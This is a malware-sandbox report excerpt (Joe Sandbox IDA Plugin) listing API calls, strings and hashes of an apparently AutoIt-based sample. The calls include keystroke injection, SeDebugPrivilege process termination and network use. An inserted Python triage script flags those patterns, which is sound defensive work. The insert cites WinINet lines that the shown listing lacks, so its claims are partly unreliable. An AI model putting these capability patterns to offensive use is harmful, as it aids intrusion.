                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                            • String ID:
                            • API String ID: 1241431887-3916222277
                            • Opcode ID: 8a664fe139f746d7545fe3a9b760700bb4976d33aec5a5d1e5e326864aebdae6
                            • Instruction ID: b0bec7126a334947c602f8975fd106476d57238b5ede5bbd032ce729be1ba3ce
                            • Opcode Fuzzy Hash: 8a664fe139f746d7545fe3a9b760700bb4976d33aec5a5d1e5e326864aebdae6
                            • Instruction Fuzzy Hash: 51413AB1501618BFEB129FA4DC89FFA77ADEB08354F14411BFA05AA291D7B099448BB0
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0011DBF0), ref: 000DBBA1
                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0011DBF0), ref: 000DBBD5
                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 000DBD33
                            • SysFreeString.OLEAUT32(?), ref: 000DBD5D
                            • StringFromGUID2.OLE32(?,?,00000028,?,0011DBF0), ref: 000DBEAD
                            • ProgIDFromCLSID.OLE32(?,?,?,0011DBF0), ref: 000DBEF7
                            • CoTaskMemFree.OLE32(?,?,?,0011DBF0), ref: 000DBF14
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                            • String ID:
                            • API String ID: 793797124-0
                            • Opcode ID: 7fef7db9435110116529ba95ed772d10ae996076cb66a15342a853ba57843efd
                            • Instruction ID: 0cd46027384bc1539370b6ad60ba6262545c8fc5296604e2f72ca7ae593a700f
                            • Opcode Fuzzy Hash: 7fef7db9435110116529ba95ed772d10ae996076cb66a15342a853ba57843efd
                            • Instruction Fuzzy Hash: 02F10C75900209EFCF14DFA4C884EAEB7BAFF89714F11849AF905AB251DB71AD41CB60
                            APIs
                            • _memset.LIBCMT ref: 000E23E6
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000E2579
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000E259D
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000E25DD
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000E25FF
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000E2760
                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 000E2792
                            • CloseHandle.KERNEL32(?), ref: 000E27C1
                            • CloseHandle.KERNEL32(?), ref: 000E2838
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                            • String ID:
                            • API String ID: 4090791747-0
                            • Opcode ID: 75017aba47cbd7e045c68d2e7afe94d512a2c54a8835954e8cc13ba3839933b4
                            • Instruction ID: 3a5c98268b7ec223c27aed1d514285403bdfb617aa6b4231022e0f38fcadfcf8
                            • Opcode Fuzzy Hash: 75017aba47cbd7e045c68d2e7afe94d512a2c54a8835954e8cc13ba3839933b4
                            • Instruction Fuzzy Hash: 7FD1AF716043419FCB14EF25C991BAABBE5BF85314F14855DF889AB2A2DB30EC41CB52
                            APIs
                            • select.WSOCK32 ref: 000D9B38
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D9B45
                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 000D9B6F
                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000D9B90
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D9B9F
                            • htons.WSOCK32(?,?,?,00000000,?), ref: 000D9C51
                            • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0011DBF0), ref: 000D9C0C
                              • Part of subcall function 000BE0F5: _strlen.LIBCMT ref: 000BE0FF
                              • Part of subcall function 000BE0F5: _memmove.LIBCMT ref: 000BE121
                            • _strlen.LIBCMT ref: 000D9CA7
                            • _memmove.LIBCMT ref: 000D9D10
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                            • String ID:
                            • API String ID: 3637404534-0
                            • Opcode ID: f60d7faa90d2b5db2e04116f1a49e411ca7b0b75b5e6f78f799a715fe45eb02f
                            • Instruction ID: ac0f5439f56db0289b052d804ec1394c9e472c525e7e1cc6fcc776f021c02bd5
                            • Opcode Fuzzy Hash: f60d7faa90d2b5db2e04116f1a49e411ca7b0b75b5e6f78f799a715fe45eb02f
                            • Instruction Fuzzy Hash: D6818B72504300ABD710EF64DC45EABB7E9EB88724F10462EF5959B292DB70DD04CBA2
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000EB204
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID:
                            • API String ID: 634782764-0
                            • Opcode ID: 87123df4ec86cbeb96a8512756807412f5e090098ce37a75f259343c7f314da8
                            • Instruction ID: b713a75ace4de1d90acf3e62a02a9e4f72ffc80583173f79e3c3111796528f4c
                            • Opcode Fuzzy Hash: 87123df4ec86cbeb96a8512756807412f5e090098ce37a75f259343c7f314da8
                            • Instruction Fuzzy Hash: 31519330500294BFEF309F6ADC96B9F3BA5AF06320F604156FA55F61A2C771E990DB50
                            APIs
                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000FE9EA
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000FEA0B
                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000FEA20
                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000FEA3D
                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000FEA64
                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0009A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 000FEA6F
                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000FEA8C
                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0009A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 000FEA97
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                            • String ID:
                            • API String ID: 1268354404-0
                            • Opcode ID: 074c9a781c0557f254f1b62dda13aea114e51e20ef996b8b26da6fa45e6233c3
                            • Instruction ID: e592fcf23edc5c0254196fc7875b966c681ce3b63c9ce544443d21ab65780c38
                            • Opcode Fuzzy Hash: 074c9a781c0557f254f1b62dda13aea114e51e20ef996b8b26da6fa45e6233c3
                            • Instruction Fuzzy Hash: 10516670600209AFDF20CF68CC81FAA77F4BB09754F104628FA56976A0D7B0ED90AB91
                            APIs
                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,000FE9A0,00000004,00000000,00000000), ref: 0009F737
                            • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,000FE9A0,00000004,00000000,00000000), ref: 0009F77E
                            • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,000FE9A0,00000004,00000000,00000000), ref: 000FEB55
                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,000FE9A0,00000004,00000000,00000000), ref: 000FEBC1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ShowWindow
                            • String ID:
                            • API String ID: 1268545403-0
                            • Opcode ID: 56c8a4e04992b14e4bde72a3ae150180cec0ba2b8456bfd72e9bdecce50b29a5
                            • Instruction ID: 6b975240a85250ed106fdc4d75d490ead77db4921b4a55b922ddf3bfcef585e5
                            • Opcode Fuzzy Hash: 56c8a4e04992b14e4bde72a3ae150180cec0ba2b8456bfd72e9bdecce50b29a5
                            • Instruction Fuzzy Hash: 2F41F93020C6C7AADF754BA8DCC8A7AFAD56B45311F68086DF197C2971C771A880F711
                            APIs
                              • Part of subcall function 000BE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BE158
                              • Part of subcall function 000BE138: GetCurrentThreadId.KERNEL32 ref: 000BE15F
                              • Part of subcall function 000BE138: AttachThreadInput.USER32(00000000,?,000BCDFB,?,00000001), ref: 000BE166
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 000BCE06
                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000BCE23
                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 000BCE26
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 000BCE2F
                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000BCE4D
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000BCE50
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 000BCE59
                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000BCE70
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000BCE73
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                            • String ID:
                            • API String ID: 2014098862-0
                            • Opcode ID: fa58497beb02f21925a7b8d47c909384775b388bf81146f2b560aae5332d1869
                            • Instruction ID: c95f40b9b6fd6dc88f7ba6adba61acaa8a468f76f238614b00d61f7d2a9b9877
                            • Opcode Fuzzy Hash: fa58497beb02f21925a7b8d47c909384775b388bf81146f2b560aae5332d1869
                            • Instruction Fuzzy Hash: 9A1104B1510618BEF7102FA4DC8EFAA3A2DEB48754F210415F3806B0E0CEF26C809AA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID: NULL Pointer assignment$Not an Object type
                            • API String ID: 0-572801152
                            • Opcode ID: 8d30e09783a734b3526d396c603831062287b5dd08d5304a40b0b4714b2f7800
                            • Instruction ID: d4a23e5ebbff31e2cea4b3122ad74233d0c7e3848d3b6e629f0b20485e9847a1
                            • Opcode Fuzzy Hash: 8d30e09783a734b3526d396c603831062287b5dd08d5304a40b0b4714b2f7800
                            • Instruction Fuzzy Hash: 54E19171A0031AABEF24DFA8D895EEE77F5AF48314F14802AEA45A7381D7709D41CB61
                            APIs
                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000E9926
                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 000E993A
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000E9954
                            • _wcscat.LIBCMT ref: 000E99AF
                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 000E99C6
                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 000E99F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$Window_wcscat
                            • String ID: SysListView32
                            • API String ID: 307300125-78025650
                            • Opcode ID: f7997c1abf329fd13791d5c4621ef252108798a4cf5405d200a1b697320974ea
                            • Instruction ID: a8cd62af4983294c2f9a96333018d66e64858c6bb2c9f2807b7abda2e01eb3ed
                            • Opcode Fuzzy Hash: f7997c1abf329fd13791d5c4621ef252108798a4cf5405d200a1b697320974ea
                            • Instruction Fuzzy Hash: EF419E71A00348AFEF219FA5CC85BEE77E8EF09350F10452AF589A7292D7719984CB60
                            APIs
                              • Part of subcall function 000C6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C6F7D
                              • Part of subcall function 000C6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 000C6F8D
                              • Part of subcall function 000C6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 000C7022
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E168B
                            • GetLastError.KERNEL32 ref: 000E169E
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E16CA
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 000E1746
                            • GetLastError.KERNEL32(00000000), ref: 000E1751
                            • CloseHandle.KERNEL32(00000000), ref: 000E1786
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                            • String ID: SeDebugPrivilege
                            • API String ID: 2533919879-2896544425
                            • Opcode ID: da47f3002d2718333f6171112dbe8e8c3f866be585a3488f3f437a6865acc268
                            • Instruction ID: bde114f4deed7f02fe084095851a2c38fa3f1e0c40ec9f273513a83ff4163ac7
                            • Opcode Fuzzy Hash: da47f3002d2718333f6171112dbe8e8c3f866be585a3488f3f437a6865acc268
                            • Instruction Fuzzy Hash: 1D41CA71604201AFDB14EF94C8A6FEDB7A5AF54704F098059F946AF293EBB4E840CB81
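Added triage example, not code from the Joe Sandbox report, the sandbox or the analysed sample. Three of the function blocks above carry the security-relevant call patterns in this stretch of the listing: the WinINet routine at 000D4C5E (InternetQueryOptionW then InternetSetOptionW, both with option 0000001F), the keystroke routine at 000BCE06 (AttachThreadInput in a subcall, then PostMessageW with message 00000100/00000101) and the process-termination routine at 000E168B (OpenProcess with access 00000001, TerminateProcess, string SeDebugPrivilege). The script below parses the report's own "• Api.MODULE(args), ref: ADDR" and "• String ID:" lines and flags those patterns with the Windows SDK constants INTERNET_OPTION_SECURITY_FLAGS (0x1F), SECURITY_FLAG_IGNORE_UNKNOWN_CA (0x100), WM_KEYDOWN/WM_KEYUP (0x100/0x101) and PROCESS_TERMINATE (0x1). Assumptions: the 00000100 the report prints as InternetSetOptionW's third (lpBuffer) argument is taken as the DWORD the buffer holds rather than a pointer, since a pointer would not be that low; the block names, the rule wording and the identification of @GUI_DRAGFILE, @GUI_DROPID, "NULL Pointer assignment" and "Not an Object type" in the neighbouring blocks as AutoIt runtime strings (which makes these routines interpreter built-ins rather than the payload's own code) are mine, not the report's.

```python
"""Triage helper for the per-function API listings in a Joe Sandbox IDA Plugin
report. Added example, not code from the report, the sandbox or the sample: it
parses the report's "• Api.MODULE(arg,...), ref: ADDR" and "• String ID:" lines
and applies three rules per function block. Constants come from the Windows SDK
headers; the sample blocks are copied from the report and the rule wording is mine.
"""
import re
from dataclasses import dataclass

INTERNET_OPTION_SECURITY_FLAGS = 0x1F           # wininet.h
SECURITY_FLAG_IGNORE_UNKNOWN_CA = 0x0100
SECURITY_FLAG_IGNORE_CERT_CN_INVALID = 0x1000
SECURITY_FLAG_IGNORE_CERT_DATE_INVALID = 0x2000
IGNORE_CERT_BITS = (SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID
                    | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID)
WM_KEYDOWN, WM_KEYUP = 0x0100, 0x0101           # winuser.h
PROCESS_TERMINATE = 0x0001                      # winnt.h

# One report call line: optional "Part of subcall function XXXX:" prefix, Api.MODULE,
# optional (args), then "ref: ADDR". Ordinal imports such as "#17.WSOCK32" also match.
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w#]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
STRING_RE = re.compile(r"•\s*String ID:\s*(?P<s>.+)")


@dataclass
class Call:
    api: str
    module: str
    args: list   # int per hex literal, None where the report prints '?'
    ref: int     # address of the call site


def parse_args(text):
    if not text or not text.strip():
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in text.split(",")]


def parse_block(lines):
    """One function block -> (list of Call, list of strings from its String ID)."""
    calls, strings = [], []
    for line in lines:
        m = CALL_RE.search(line)
        if m:
            calls.append(Call(m["api"], m["mod"], parse_args(m["args"]), int(m["ref"], 16)))
            continue
        m = STRING_RE.search(line)
        if m:
            strings.extend(m["s"].split("$"))   # the report joins strings with '$'
    return calls, strings


def flag_block(lines):
    """Return the findings for one block; an empty list means no rule matched."""
    calls, strings = parse_block(lines)
    names = {c.api for c in calls}
    findings = []
    # Rule 1: INTERNET_OPTION_SECURITY_FLAGS written with IGNORE_* bits. Assumption:
    # the printed lpBuffer value is the DWORD in the buffer, not a pointer.
    for c in calls:
        if (c.api == "InternetSetOptionW" and len(c.args) >= 3
                and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS
                and c.args[2] is not None and c.args[2] & IGNORE_CERT_BITS):
            findings.append(f"{c.ref:08X}: TLS certificate checks relaxed, "
                            f"SECURITY_FLAGS bits 0x{c.args[2] & IGNORE_CERT_BITS:X}")
    # Rule 2: process-kill capability requested alongside SeDebugPrivilege.
    if {"OpenProcess", "TerminateProcess"} <= names and "SeDebugPrivilege" in strings:
        for c in calls:
            if c.api == "OpenProcess" and c.args and c.args[0] == PROCESS_TERMINATE:
                findings.append(f"{c.ref:08X}: OpenProcess(PROCESS_TERMINATE) + "
                                "TerminateProcess with SeDebugPrivilege")
                break
    # Rule 3: keystrokes posted into another thread's input queue.
    if "AttachThreadInput" in names:
        keys = [c for c in calls if c.api == "PostMessageW" and len(c.args) >= 3
                and c.args[1] in (WM_KEYDOWN, WM_KEYUP)]
        if keys:
            vks = ",".join(f"0x{c.args[2]:02X}" for c in keys if c.args[2] is not None)
            findings.append(f"{keys[0].ref:08X}: AttachThreadInput + PostMessageW "
                            f"WM_KEYDOWN/WM_KEYUP, virtual keys {vks}")
    return findings


SAMPLE_BLOCKS = {   # lines copied from the report's function blocks; names are mine
    "wininet_000D4C5E": [
        "• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D4C5E",
        "• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000D4CCC",
        "• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000D4CE1",
        "• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D4CEE",
    ],
    "kill_000E168B": [
        "• Part of subcall function 000C6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C6F7D",
        "• OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E168B",
        "• GetLastError.KERNEL32 ref: 000E169E",
        "• TerminateProcess.KERNEL32(00000000,00000000), ref: 000E1746",
        "• String ID: SeDebugPrivilege",
    ],
    "keys_000BCE06": [
        "• Part of subcall function 000BE138: AttachThreadInput.USER32(00000000,?,000BCDFB,?,00000001), ref: 000BE166",
        "• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000BCE23",
        "• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000BCE4D",
        "• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000BCE70",
    ],
    "paint_000EB204": ["• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000EB204"],
}


def triage(blocks=SAMPLE_BLOCKS):
    """Map block name -> findings for every block (empty list when clean)."""
    return {name: flag_block(lines) for name, lines in blocks.items()}


if __name__ == "__main__":
    for name, hits in triage().items():
        print(name, "->", hits or "no findings")
```

Run it against a whole report by splitting the text on the "APIs" headers and feeding each block to flag_block; only the WinINet rule depends on the lpBuffer assumption stated above, and the other two read plain immediates and the String ID line.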
                            APIs
                            • LoadIconW.USER32(00000000,00007F03), ref: 000C62D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2457776203-404129466
                            • Opcode ID: ced1e7c1ded190620b907f71a98d75181c4bd2658460bda6885b399217bb5c43
                            • Instruction ID: dd950d44b1767bf4e03dc18b0a4ef358cd3eb163666f2d0ca9a6d028d9781ace
                            • Opcode Fuzzy Hash: ced1e7c1ded190620b907f71a98d75181c4bd2658460bda6885b399217bb5c43
                            • Instruction Fuzzy Hash: 6011DD75208752BED7255B94DC43FEE77EC9F1A724F10002DF541A66C2E7A26A404169
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 000C7595
                            • LoadStringW.USER32(00000000), ref: 000C759C
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000C75B2
                            • LoadStringW.USER32(00000000), ref: 000C75B9
                            • _wprintf.LIBCMT ref: 000C75DF
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C75FD
                            Strings
                            • %s (%d) : ==> %s: %s %s, xrefs: 000C75DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s
                            • API String ID: 3648134473-3128320259
                            • Opcode ID: 077c89cedf70c978d0f3f6eb7aaf2f2677a18ca17880f6f31342c43a4bedff58
                            • Instruction ID: b6f2a4f90888a8c31e8e196767df4a1be7d0d91017fddc037a50d70523963451
                            • Opcode Fuzzy Hash: 077c89cedf70c978d0f3f6eb7aaf2f2677a18ca17880f6f31342c43a4bedff58
                            • Instruction Fuzzy Hash: 4C011DF2904218BFE711A7E4AD89EEA776CDB08301F0044A5B746E2041EAB59EC48B75
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                              • Part of subcall function 000E3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2AA6,?,?), ref: 000E3B0E
